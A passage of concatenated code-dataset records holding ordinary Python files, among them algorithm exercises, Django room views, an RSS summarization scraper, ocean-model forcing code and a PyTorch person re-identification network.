datetime.datetime.strptime(e[\"start_date\"], \"%a, %d %b %Y %H:%M:%S %Z\")\n            recv_times.append(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n        assert_equal([soonest, sooner, soon], recv_times)\n\n    def test_events_are_paginated(self):\n        names = []\n        for i in range(12):\n            names.append(\"Event #%s\" % i)\n\n        for n in names:\n            self.create_event({\"name\": n})\n\n        all_events = self.client.get(\"/events\").json\n        assert_equal(len(all_events), 10)\n\n        all_events = self.client.get(\"/events?page=2\").json\n        assert_equal(len(all_events), 2)\n\n        all_events = self.client.get(\"/events?page=-50\").json\n        assert_equal(len(all_events), 10)\n","repo_name":"worace/hfa_events","sub_path":"backend/tests/api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12564569478","text":"revenue = float(input('How much did we earn this period: '))\ncosts = float(input('How much did we spend this month: '))\nprofitability = 0\nprofit = revenue - costs\n\nif revenue < costs:\n    print('The treasury is running dry, My Lord!')\nelif revenue == costs:\n    print('We need more gold!')\nelse:\n    print('We are in the black, well done!')\n    profitability = profit / revenue\n    manNumber = int(input('How many of us worked: '))\n    usefulness = profit / manNumber\n    print('Each of us brought in: ', usefulness)\n","repo_name":"Evgded/Python","sub_path":"Dz15PonomarevP.py","file_name":"Dz15PonomarevP.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27322840400","text":"import csv\nimport numpy\n\n\ndef dict_from_csv(): # builds a dict from the file: the key is the volume, the value is the date.\n    with open(\"history/MRNA1.csv\") as File:\n        reader = csv.DictReader(File) # open the file as a dict\n        dict_from_csv = {}\n        for row in reader:\n            dict_from_csv[row['Volume']] = row['Date']\n    return dict_from_csv\n# print(dict_from_csv())\n\n\ndef list_from_csv_vol(): # turns a file column into a list and converts the entries to numbers.\n    with open(\"history/MRNA1.csv\") as File:\n        reader = csv.DictReader(File) # open the file as a dict\n        volume_as_list = []\n        for row in reader:\n            volume_as_list.append(row['Volume']) # turn the volume column into a list\n        if 'Volume' in volume_as_list:\n            volume_as_list.remove('Volume')\n        for i in range(0, len(volume_as_list)):\n            volume_as_list[i] = int(volume_as_list[i]) # convert the list elements from strings to int\n    return volume_as_list\n\n\na = max(list_from_csv_vol()[-30:-1])\nb = dict_from_csv()[str(a)]\n\naverage_of_volume = numpy.round(numpy.mean(list_from_csv_vol()))\n\nfor x in list_from_csv_vol():\n    if x >= average_of_volume * 3:\n        print(dict_from_csv()[str(x)])\n\n","repo_name":"i5ilya/StockAnalyzeVolume","sub_path":"old_versions_manual_git/working_func.py","file_name":"working_func.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16716242943","text":"def solution(numbers, target):\n    q = [0]\n    j = 0\n    while j < len(numbers): # at most 2**20 (about 10**6) candidate sums, so O(n**2)-style code is fine\n        cal_list = [] # empty list to collect the values computed as the index advances\n        for i in q: # removing from and appending to q in place raises errors\n            cal_list.append(i + numbers[j]) # so swapping in a whole new list is better\n            cal_list.append(i - numbers[j])\n        j += 1 # bump the index after the for loop completes\n        q = cal_list\n    return q.count(target)\n\n\n
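# e.g. solution([1, 1, 1, 1, 1], 3): #plus - #minus = 3 over five 1s, so #plus = 4 and C(5, 4) = 5 ways\n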
print(solution([1, 1, 1, 1, 1], 3))\n","repo_name":"wonn23/algorithm-study","sub_path":"0630/HCW(BFS_DFS)/target_number.py","file_name":"target_number.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42317588859","text":"#Uses python3\nimport sys\nimport math\n\ndef distance(p1,p2):\n    return ((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)**0.5\n\ndef minimum_distance(x, y, points):\n    result = 0.\n    #write your code here\n    cost = [float('inf')] * n\n    parents = [0] * n\n    prioq = []\n    cost[0] = 0\n    for i in range(n):\n        prioq.append([cost[i],i])\n    while len(prioq) > 0:\n        v = min(prioq)\n        for i in range(n):\n            if i in [item[1] for item in prioq] and i != v[1] and cost[i] > distance(points[v[1]],points[i]):\n                cost[i] = distance(points[v[1]],points[i])\n                parents[i] = v[1]\n                for j in prioq:\n                    if j[1] == i:\n                        prioq[prioq.index(j)][0] = cost[i]\n        prioq.remove(v)\n        if len(prioq) > 0:\n            x = min(prioq)\n            result = result + x[0]\n    return result\n\n\nif __name__ == '__main__':\n    input = sys.stdin.read()\n    data = list(map(int, input.split()))\n    n = data[0]\n    x = data[1::2]\n    y = data[2::2]\n    points = []\n    for i in range(n):\n        points.append([x[i],y[i]])\n    print(\"{0:.9f}\".format(minimum_distance(x, y, points)))\n","repo_name":"anuar-a/DSA-Algorithmic-toolbox","sub_path":"connecting_points.py","file_name":"connecting_points.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17833287052","text":"import queue\n\n\nclass Graph:\n    def __init__(self, nVertices):\n        self.nVertices = nVertices\n        self.adjMatrix = [[0 for j in range(nVertices)]\n                          for i in range(nVertices)]\n\n    def addEdge(self, v1, v2):\n        self.adjMatrix[v1][v2] = 1\n        self.adjMatrix[v2][v1] = 1\n\n    def bfsHelper(self, visited, source):\n        q = queue.Queue()\n        q.put(source)\n        visited[source] = True\n        while not q.empty():\n            u = q.get()\n            print(u, end=' ')\n            for i in range(self.nVertices):\n                if self.adjMatrix[u][i] == 1 and not visited[i]:\n                    q.put(i)\n                    visited[i] = True\n\n    def bfs(self):\n        visited = [False for i in range(self.nVertices)]\n        for i in range(self.nVertices):\n            if not visited[i]:\n                self.bfsHelper(visited, i)\n\n    def __str__(self):\n        return str(self.adjMatrix)\n\n\nv, e = [int(x) for x in input().split()[:2]]\ng = Graph(v)\nfor i in range(e):\n    a, b = [int(x) for x in input().split()[:2]]\n    g.addEdge(a, b)\ng.bfs()\n","repo_name":"aayush19973636/Data-Structures-and-Algorithms","sub_path":"Graphs 1/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"} +{"seq_id":"40613326087","text":"from intcode import IntCode\nfrom pixgrid import Grid\nimport numpy as np\n\nwith open(\"11.dat\", \"r\") as f:\n    raw = f.readline()\n    code = [int(v) for v in raw.split(\",\")]\n\n\nclass Robot:\n    def __init__(self):\n        # intcode output buffer\n        self.buf = None\n\n        # colors\n        self.BLACK = 0\n        self.WHITE = 1\n\n        # directions\n        self.UP = 0\n        self.DOWN = 1\n        self.LEFT = 2\n        self.RIGHT = 3\n\n        self.coord = (0, 0) # current coord in arbitrarily-sized grid\n        self.coords = dict() # visited coords\n        self.robdir = self.UP # robot direction\n\n        # movement deltas for each turn motion\n        # (x,y)\n        self.deltas = [\n            (0, 1), # up\n            (0, -1), # down\n            (-1, 0), # left\n            (1, 0) # right\n        ]\n\n        # number of painted squares\n        self.painted = 0\n        # counter for determining read mode (color or turn direction)\n        
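# even self.mode: the next intcode output is a paint color; odd: a turn direction\n        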
self.mode = 0\n\n def getdir(self, dir, turn_right):\n # get new turn direction based on current robot direction\n if dir == self.UP:\n return self.RIGHT if turn_right else self.LEFT\n elif dir == self.DOWN:\n return self.LEFT if turn_right else self.RIGHT\n elif dir == self.LEFT:\n return self.UP if turn_right else self.DOWN\n elif dir == self.RIGHT:\n return self.DOWN if turn_right else self.UP\n\n def getdelta(self, curdir, turn_right):\n # get new turn direction and movement delta,\n # based on current direction and turn motion (left/right)\n newdir = self.getdir(curdir, turn_right)\n return (newdir, self.deltas[newdir])\n\n def send_square(self):\n if self.coord in self.coords:\n # get color of already visited square\n return self.coords[self.coord]\n if self.mode == 0:\n # initial state: starting on a white square\n return self.WHITE\n else:\n # unvisited squares are black\n return self.BLACK\n\n def read_robot(self, v):\n # mode\n # * odd: turn direction\n # * even: color\n if self.mode % 2:\n # got turn command, read color command from buffer\n c = self.buf\n d = v\n # color\n if self.coord in self.coords:\n if self.coords[self.coord] != c:\n # change color of already painted square\n self.coords[self.coord] = c\n # misunderstood instructions. thought these should count as\n # painted for part A...\n # but nope, no need for 'self.painted += 1' here\n else:\n # paint new square\n self.coords[self.coord] = c\n if c == self.WHITE:\n self.painted += 1\n # turn direction\n newdir, delta = self.getdelta(self.robdir, d)\n self.robdir = newdir\n xd, yd = delta\n self.coord = (self.coord[0] + xd, self.coord[1] + yd)\n # clear command buffer\n self.buf = None\n else:\n # got color command, store it in buffer\n self.buf = v\n self.mode += 1\n\n\nic = IntCode(code)\nrob = Robot()\n\nic.set_input_func(rob.send_square)\nic.set_output_func(rob.read_robot)\nic.parse()\n\nprint(\"Painted squares:\")\nprint(rob.painted)\n\n# and now for the obligatory ugly hard-coding to finalize it all!\nmaxx, maxy, minx, miny = 0, 0, 0, 0\nfor k, v in rob.coords.items():\n # get max and min grid coords\n x, y = k\n maxx = max(x, maxx)\n minx = min(x, minx)\n maxy = max(y, maxy)\n miny = min(y, miny)\n\n# grid size\nw = maxx - minx\nh = maxy - miny\n\n# create grid and plot points in it\ng = Grid(w, h + 1) # account for overflow\nfor k, v in rob.coords.items():\n if v:\n x, y = k\n # invert negative y. 
in space there's no real concept of up or down ;-)\n        y *= -1\n        g.plot(x, y)\n\nprint(\"Solution for B:\")\ng.to_ascii()\n","repo_name":"mxgordon/advent_of_code","sub_path":"2019/day11/sol/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26074029416","text":"import cv2\nimport os\n\n# import cv2\n# print(cv2.__version__)\n# vidcap = cv2.VideoCapture('big_buck_bunny_720p_5mb.mp4')\n# success,image = vidcap.read()\n# count = 0\n# success = True\n# # os.makedirs('/data')\n# while success:\n#   cv2.imwrite(\"./data/%010d.jpg\" % count, image)     # save frame as JPEG file\n#   success,image = vidcap.read()\n#   print( 'Read a new frame: ', success)\n#   count += 1\n\nvideo = cv2.VideoCapture('big_buck_bunny_720p_5mb.mp4')\nnum = 0\nret = True\nwhile ret:\n    ret, frame = video.read()\n    if not num % 60:\n        print(num)\n    # cv2.imwrite(\"./data/%010d.jpg\" % num, frame)\n    # print('Recording frame No ', num)\n    num += 1\n","repo_name":"Horizont32/work","sub_path":"video_frames.py","file_name":"video_frames.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"16306015340","text":"from typing import List\n\n\nclass Solution:\n    \"\"\"\"\"\"\n\n    \"\"\"One Pass approach, time n, space 1\"\"\"\n\n    def maxProfit(self, prices: List[int]) -> int:\n\n        if not prices:\n            return 0\n\n        max_profit = 0\n        low_p = prices[0]\n\n        for p in prices[1:]:\n            low_p = min(low_p, p)\n            max_profit = max(max_profit, p - low_p)\n\n        return max_profit\n","repo_name":"RunkunXie/LeetCode","sub_path":"Problems/src/121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13738302559","text":"from __future__ import absolute_import\nimport os\nimport datetime\nfrom datetime import date\nimport dateutil.parser\nimport pandas as pd\nfrom celery import Celery\nimport rss_funcs as rss\nimport extractive_summarizer_funcs as summ\n\n\n# def make_celery(app_name):\n#     celery = Celery(\n#         app_name,\n#         broker=\"amqp://localhost//\",\n#         # broker=\"amqps://dizvnogv:DCfzIGZ8dIDpSbCjZz7eMkD6_ImjJ7DR@coyote.rmq.cloudamqp.com/dizvnogv\"\n#     )\n\n#     # celery.Task = ContextTask\n#     return celery\n\napp = Celery('celery', broker=\"pyamqp://localhost//\")\n\n\n@app.task\ndef get_content():\n    celebrity_links = get_xml_links()\n    cat_rss_reject_dict = get_extracted_xml()\n    ## Loop through all the categories\n    # Initial params\n    today = date.today()\n    now = datetime.datetime.now()\n    curr_hour = now.hour\n\n    # Parameters for article summarisation\n    num_sents_in_summary = 3\n    sentence_threshold = 100\n\n    ## Loop through all the names in the category dictionary\n    for name in celebrity_links.keys():\n        print('__________________________________________________')\n        print('Publisher name: %s' % name)\n        try:\n            rss_link = celebrity_links[name]\n            rss_content_df = rss.get_rss_content_df(rss_link)\n            print(rss_content_df.columns)\n            ## **Add code here to filter out content not published in the last hour\n            reject_p_tags = cat_rss_reject_dict[name]\n\n            ## Add code to loop through all the articles in the rss_content_df\n\n            for i in range(len(rss_content_df)):\n                article_title = rss_content_df.iloc[i]['Title']\n                article_url = rss_content_df.iloc[i]['Link']\n
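                # feeds disagree on the timestamp field, so prefer 'Published' and fall back to 'Updated'\n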
                try:\n                    published_dates = rss_content_df.iloc[i]['Published']\n                except Exception:\n                    published_dates = rss_content_df.iloc[i]['Updated']\n                published_date_raw = dateutil.parser.parse(published_dates)\n\n                published_date = published_date_raw.date()\n                if published_date == today:\n                    hour = published_date_raw.hour\n                    if hour >= curr_hour-3:\n\n                        article_text, summary_sentences, entity_names, categorized_data, max_img, keywords = get_article_metadata(article_url, reject_p_tags, num_sents_in_summary, sentence_threshold)\n\n                        # data = []\n                        test = [article_title, published_dates,summary_sentences,categorized_data,max_img,keywords, entity_names]\n                        df = pd.DataFrame(test)\n                        new = df.T\n                        new.rename(columns = {new.columns[0]: \"article_title\", new.columns[1]: \"published_date\", new.columns[2]: \"summary_sentences\", \n                                              new.columns[3]: \"categorized_data\", new.columns[4]: \"max_img\",\n                                             new.columns[5]: \"keywords\", new.columns[6]: \"entity_names\" }, inplace = True )\n                        new.to_csv(\"testing.csv\", index=False)\n                        ##------------- SAVING TO DATABASE -------------\n                        import pymongo\n                        client = pymongo.MongoClient()\n                        client = client['Bloverse']\n                        article_collection = client['articles']\n\n\n                        # db = client.scraper\n                        # twitter_user_collection = db.article # similarly if 'testCollection' did not already exist, Mongo would create it\n                        df = pd.read_csv('testing.csv')\n\n                        # de-duplicate: skip articles whose title is already stored in Mongo\n                        scraped = list(article_collection.find({}, { \"_id\": 0, \"title\": 1}))\n                        scraped = list((val for dic in scraped for val in dic.values()))\n\n                        for article_title, published_dates,summary_sentences,categorized_data, max_img, keywords, entity_names in df[['article_title', 'published_date', 'summary_sentences', 'categorized_data', 'max_img', 'keywords', 'entity_names']].itertuples(index=False):\n                            if article_title not in scraped:\n                                article_collection.insert_one({'title':article_title, 'publish_date':published_dates, 'Summary': summary_sentences, 'categorized_data': categorized_data,'max_img':max_img,'keywords': keywords, 'entity_names': entity_names}) ####save the df to the collection\n\n        except Exception as e:\n            print(e)\n            print('We were unable to get the content for this publisher, consider deleting them')\n\n        print('__________________________________________________')\n\n\napp.conf.beat_schedule = {\n    \"see-you-in-ten-seconds-task\": {\n        \"task\": \"celery.get_content\",\n        \"schedule\": 10.0\n    }\n}","repo_name":"nathphoenix/rss_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23371429276","text":"from django.shortcuts import render\nfrom rest_framework import generics, status\nfrom .serializers import RoomSerializer, CreateRoomSerializer, UpdateRoomSerializer\nfrom .models import Room\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\n\n# Create your views here.\nclass RoomView(generics.ListAPIView):\n    queryset = Room.objects.all()\n    serializer_class = RoomSerializer\n\n# creates a new room\nclass CreateRoomView(APIView):\n    serializer_class = CreateRoomSerializer\n\n    def post(self, request, format=None):\n        # check if user is in session and create if user is not in session\n        if not self.request.session.exists(self.request.session.session_key):\n            self.request.session.create()\n        \n        serializer = self.serializer_class(data=request.data)\n\n        if serializer.is_valid():\n            # if serializer is valid, extract data from request and fetch room\n            # whose host is the current user\n            guest_can_pause = 
serializer.data.get('guest_can_pause')\n votes_to_skip = serializer.data.get('votes_to_skip')\n host = self.request.session.session_key\n queryset = Room.objects.filter(host=host)\n\n if queryset.exists():\n # if room already exists, update it with new data from the request\n room = queryset[0]\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n self.request.session['room_code'] = room.code\n else:\n # else create a new room with the data from the request\n room = Room(host=host, guest_can_pause = guest_can_pause, votes_to_skip=votes_to_skip)\n\n room.save()\n self.request.session['room_code'] = room.code\n \n return Response(RoomSerializer(room).data, status=status.HTTP_201_CREATED)\n\n# fetches a room\nclass GetRoom(APIView):\n serializer_class = RoomSerializer\n # key by which to filter rooms\n lookup_url_kwarg = 'code'\n\n def get(self, request, format=None):\n code = request.GET.get(self.lookup_url_kwarg)\n\n if code != None:\n room = Room.objects.filter(code=code)\n # if room exists, find whether current user is the host and return data,\n # else return error with appropriate status\n if len(room) > 0:\n data = RoomSerializer(room[0]).data\n data['is_host'] = self.request.session.session_key == room[0].host\n return Response(data, status=status.HTTP_200_OK)\n return Response({'Room not found':'Invalid code'}, status=status.HTTP_404_NOT_FOUND)\n \n # do not query if code is not in request\n return Response({'Bad Request':'Code parameter not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n# handles joining a room\nclass JoinRoom(APIView):\n lookup_url_kwarg = 'code'\n\n def post(self, request, format=None):\n # check and create session for current user if it does not exist\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n \n # get code from the request\n code = request.data.get(self.lookup_url_kwarg)\n if code != None:\n room = Room.objects.filter(code=code)\n\n # check if room with code exists and join if it does. 
or else return error response\n if len(room) > 0:\n room = room[0]\n self.request.session['room_code'] = code\n return Response({'message':'Room Joined'}, status=status.HTTP_200_OK)\n\n return Response({'Bad Request':'Invalid code, room not found'}, status=status.HTTP_400_BAD_REQUEST)\n \n return Response({'Bad Request':'Invalid code, room not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n# check if user is in the room\nclass UserInRoom(APIView):\n def get(self, request, format=None):\n # check and create session for user if it does not already exist\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n\n # if user has already joined a room in this session, return the code of that room\n data = {\n 'code': self.request.session.get('room_code')\n }\n\n return JsonResponse(data, status=status.HTTP_200_OK)\n\n# leave a room\nclass LeaveRoom(APIView):\n def post(self, request, format=None):\n if 'room_code' in self.request.session:\n # remove room from session\n self.request.session.pop('room_code')\n # if the user who left the room is also the host, delete the room\n host_id = self.request.session.session_key\n room_results = Room.objects.filter(host=host_id)\n if len(room_results) > 0:\n room = room_results[0]\n room.delete()\n return Response({'message':'Success'}, status=status.HTTP_200_OK)\n\nclass UpdateRoom(APIView):\n serializer_class = UpdateRoomSerializer\n\n def patch(self, request, format=None):\n # check and create session for current user if it does not already exist\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n\n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n # extract the data\n guest_can_pause = serializer.data.get('guest_can_pause')\n votes_to_skip = serializer.data.get('votes_to_skip')\n code = serializer.data.get('code')\n\n queryset = Room.objects.filter(code=code)\n\n # check whether room exists\n if not queryset.exists():\n return Response({'msg':'Room not found'}, status=status.HTTP_404_NOT_FOUND)\n\n room = queryset[0]\n user_id = self.request.session.session_key\n\n # only allow host to update room settings\n if room.host != user_id:\n return Response({'msg':'Only the host can update room settings'}, status=status.HTTP_403_FORBIDDEN)\n \n # update the room and respond with 'OK'\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n return Response(RoomSerializer(room).data, status=status.HTTP_200_OK)\n\n return Response({'Bad Request':'Invalid data'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"vykhy/spotify-django","sub_path":"music_controller/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42352515817","text":"\"\"\"\nThis makes the atm forcing files for an analytical run.\n\nDesigned to run only as backfill.\n\nTesting:\n\nrun make_forcing_main.py -g ae0 -r backfill -d 2020.01.01 -f atmA0 -test True\n\n\"\"\"\n\nfrom pathlib import Path\nimport sys\nfrom datetime import datetime, timedelta\n\nfrom lo_tools import forcing_argfun2 as ffun\n\nLdir = ffun.intro() # this handles all the argument passing\nresult_dict = dict()\nresult_dict['start_dt'] = datetime.now()\n\n# ****************** CASE-SPECIFIC CODE *****************\n\nimport xarray as xr\nfrom time import time\nimport 
numpy as np\nfrom lo_tools import Lfun, zfun, zrfun\n\nif Ldir['testing']:\n    from importlib import reload\n    reload(zrfun)\n\n# This directory is created, along with Info and Data subdirectories, by ffun.intro()\nout_dir = Ldir['LOo'] / 'forcing' / Ldir['gridname'] / ('f' + Ldir['date_string']) / Ldir['frc']\n\n# get grid and S info, and some sizes\nG = zrfun.get_basic_info(Ldir['grid'] / 'grid.nc', only_G=True)\nNR = G['M']; NC = G['L']\n\n# Make the time vector. Here I just have two time points, at the start\n# and end of the day, but you could have more, e.g. hourly. You would still\n# want the total time to just be one day.\ndt0 = datetime.strptime(Ldir['date_string'], Lfun.ds_fmt)\ndt1 = dt0 + timedelta(days=1)\not_vec = np.array([Lfun.datetime_to_modtime(dt0), Lfun.datetime_to_modtime(dt1)])\nNT = len(ot_vec)\n\n# Create fields for the state variables.\nvn_list = ['Pair','rain','swrad','lwrad_down','Tair','Qair','Uwind','Vwind']\n\n# For now we just fill everything with zeros and nan's\nomat = np.zeros((NT, NR, NC))\n# mr2 = np.ones((NT, NR, NC)) * G['mask_rho'].reshape((1, NR, NC))\n# omat[mr2==0] = np.nan\n# NOTE: when we tried masking for atm fields, ROMS did not like it.\n\nfor vn in vn_list:\n    out_fn = out_dir / (vn + '.nc')\n    out_fn.unlink(missing_ok=True)\n    ds = xr.Dataset()\n    vinfo = zrfun.get_varinfo(vn)\n    tname = vinfo['time_name']\n    dims = (tname,) + vinfo['space_dims_tup']\n    # You could intervene here by writing something different than omat.\n    ds[vn] = (dims, omat.copy())\n    ds[vn].attrs['units'] = vinfo['units']\n    ds[vn].attrs['long_name'] = vinfo['long_name']\n    # time coordinate\n    ds[tname] = ((tname,), ot_vec)\n    ds[tname].attrs['units'] = Lfun.roms_time_units\n    ds[tname].attrs['long_name'] = 'ocean time'\n    # and save to NetCDF\n    Enc_dict = {vn:zrfun.enc_dict for vn in ds.data_vars}\n    ds.to_netcdf(out_fn, encoding=Enc_dict)\n    ds.close()\n\ndef print_info(fn):\n    print('\\\\n' + str(fn))\n    ds = xr.open_dataset(fn)#, decode_times=False)\n    print(ds)\n    ds.close()\n\n# Check results\nnc_list = [item + '.nc' for item in vn_list]\nif Ldir['testing']:\n    # print info about the files to the screen\n    for fn in nc_list:\n        print_info(out_dir / fn)\nresult_dict['result'] = 'success'\nfor fn in nc_list:\n    if (out_dir / fn).is_file():\n        pass\n    else:\n        result_dict['result'] = 'fail'\n\n# *******************************************************\n\nresult_dict['end_dt'] = datetime.now()\nffun.finale(Ldir, result_dict)\n","repo_name":"parkermac/LO","sub_path":"forcing/atmA0/make_forcing_main.py","file_name":"make_forcing_main.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"22332293127","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path(\"/\", views.index, name='', name='index'),\n path('CollectionDash/', views.CollectionDash, name='CollectionDash'),\n\n path('DispatchForm1/', views.DispatchForm1, name='DispatchForm1'),\n\n path('CollectionDashDetails/', views.CollectionDashDetails, name='CollectionDashDetails'),\n\n path('DispatchForm2/', views.DispatchForm2, name='DispatchForm2'),\n\n path('DispatchForm3/', views.DispatchForm3, name='DispatchForm3'),\n\n path('HomePage/', views.HomePage, name='HomePage'),\n\n path('InwardChoices/', views.InwardChoices, name='InwardChoices'),\n\n path('InwardForm1/', views.InwardForm1, name='InwardForm1'),\n\n path('InwardForm2/', views.InwardForm2, name='InwardForm2'),\n\n path('', views.Login, name='Login'),\n\n path('Outwardchoices/', views.Outwardchoices, name='Outwardchoices'),\n\n path('RegisterVendorPage2/', views.RegisterVendorPage2, name='RegisterVendorPage2'),\n\n path('RegisterVendorSuccess/', views.RegisterVendorSuccess, name='RegisterVendorSuccess'),\n\n path('RegistorVendorForm1/', views.RegistorVendorForm1, name='RegistorVendorForm1'),\n\n path('SignUp/', views.SignUp, name='SignUp'),\n\n path('SuccessDispatch/', views.SuccessDispatch, name='SuccessDispatch'),\n\n path('SuccessInward/', views.SuccessInward, name='SuccessInward'),\n\n path('SuccessOutward/', views.SuccessOutward, name='SuccessOutward'),\n\n path('Admin_Dashboard/', views.Admin_Dashboard, name='Admin_Dashboard'),\n\n path('SavedDrafts/', views.SavedDrafts, name='SavedDrafts'),\n\n path('ProfilePage/', views.ProfilePage, name='ProfilePage'),\n\n path('Login2/', views.Login2, name='Login2'),\n\n path('SignUp2/', views.SignUp2, name='SignUp2'),\n\n path('DispatchForm4/', views.DispatchForm4, name='DispatchForm4'),\n\n path('PurchaseOrders/', views.PurchaseOrders, name='PurchaseOrders'),\n\n path('CollectionDash/ajax/objects.txt',views.ajax, name='ajax'),\n\n path('CollectionDashDetails/ajax/objects.txt',views.ajax, name='ajax'),\n\n\n]","repo_name":"dhruvv7772/ReCircle_B2B","sub_path":"testsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30188483862","text":"import sys\n_module = sys.modules[__name__]\ndel sys\ndata = _module\nloss = _module\nmain = _module\nnetwork = _module\nopt = _module\nRandomErasing = _module\nRandomSampler = _module\nTripletLoss = _module\nextract_feature = _module\nget_optimizer = _module\nmetrics = _module\ntransform_cuhk03 = _module\n\nfrom _paritybench_helpers import _mock_config, patch_functional\nfrom unittest.mock import mock_open, MagicMock\nfrom torch.autograd import Function\nfrom torch.nn import Module\nimport abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings\nimport numpy as np\nfrom torch import Tensor\npatch_functional()\nopen = mock_open()\nyaml = logging = sys = argparse = MagicMock()\nArgumentParser = argparse.ArgumentParser\n_global_config = args = argv = cfg = config = params = _mock_config()\nargparse.ArgumentParser.return_value.parse_args.return_value = _global_config\nyaml.load.return_value = _global_config\nsys.argv = _global_config\n__version__ = '1.0.0'\nxrange = range\nwraps = functools.wraps\n\n\nfrom torchvision import transforms\n\n\nfrom torch.utils.data 
import dataset\n\n\nfrom torch.utils.data import dataloader\n\n\nfrom torchvision.datasets.folder import default_loader\n\n\nimport re\n\n\nfrom torch.nn import CrossEntropyLoss\n\n\nfrom torch.nn.modules import loss\n\n\nimport numpy as np\n\n\nfrom scipy.spatial.distance import cdist\n\n\nimport matplotlib\n\n\nimport matplotlib.pyplot as plt\n\n\nimport torch\n\n\nfrom torch.optim import lr_scheduler\n\n\nimport copy\n\n\nimport torch.nn as nn\n\n\nfrom torchvision.models.resnet import resnet50\n\n\nfrom torchvision.models.resnet import Bottleneck\n\n\nimport random\n\n\nimport collections\n\n\nfrom torch.utils.data import sampler\n\n\nfrom torch.optim import Adam\n\n\nfrom torch.optim import SGD\n\n\nclass TripletLoss(nn.Module):\n \"\"\"Triplet loss with hard positive/negative mining.\n Reference:\n Hermans et al. In Defense of the Triplet Loss for Person Re-Identification. arXiv:1703.07737.\n Code imported from https://github.com/Cysu/open-reid/blob/master/reid/loss/triplet.py.\n Args:\n margin (float): margin for triplet.\n \"\"\"\n\n def __init__(self, margin=0.3, mutual_flag=False):\n super(TripletLoss, self).__init__()\n self.margin = margin\n self.ranking_loss = nn.MarginRankingLoss(margin=margin)\n self.mutual = mutual_flag\n\n def forward(self, inputs, targets):\n \"\"\"\n Args:\n inputs: feature matrix with shape (batch_size, feat_dim)\n targets: ground truth labels with shape (num_classes)\n \"\"\"\n n = inputs.size(0)\n dist = torch.pow(inputs, 2).sum(dim=1, keepdim=True).expand(n, n)\n dist = dist + dist.t()\n dist.addmm_(1, -2, inputs, inputs.t())\n dist = dist.clamp(min=1e-12).sqrt()\n mask = targets.expand(n, n).eq(targets.expand(n, n).t())\n dist_ap, dist_an = [], []\n for i in range(n):\n dist_ap.append(dist[i][mask[i]].max().unsqueeze(0))\n dist_an.append(dist[i][mask[i] == 0].min().unsqueeze(0))\n dist_ap = torch.cat(dist_ap)\n dist_an = torch.cat(dist_an)\n y = torch.ones_like(dist_an)\n loss = self.ranking_loss(dist_an, dist_ap, y)\n if self.mutual:\n return loss, dist\n return loss\n\n\nclass Loss(loss._Loss):\n\n def __init__(self):\n super(Loss, self).__init__()\n\n def forward(self, outputs, labels):\n cross_entropy_loss = CrossEntropyLoss()\n triplet_loss = TripletLoss(margin=1.2)\n Triplet_Loss = [triplet_loss(output, labels) for output in outputs[1:4]]\n Triplet_Loss = sum(Triplet_Loss) / len(Triplet_Loss)\n CrossEntropy_Loss = [cross_entropy_loss(output, labels) for output in outputs[4:]]\n CrossEntropy_Loss = sum(CrossEntropy_Loss) / len(CrossEntropy_Loss)\n loss_sum = Triplet_Loss + 2 * CrossEntropy_Loss\n None\n return loss_sum\n\n\nnum_classes = 751\n\n\nclass MGN(nn.Module):\n\n def __init__(self):\n super(MGN, self).__init__()\n feats 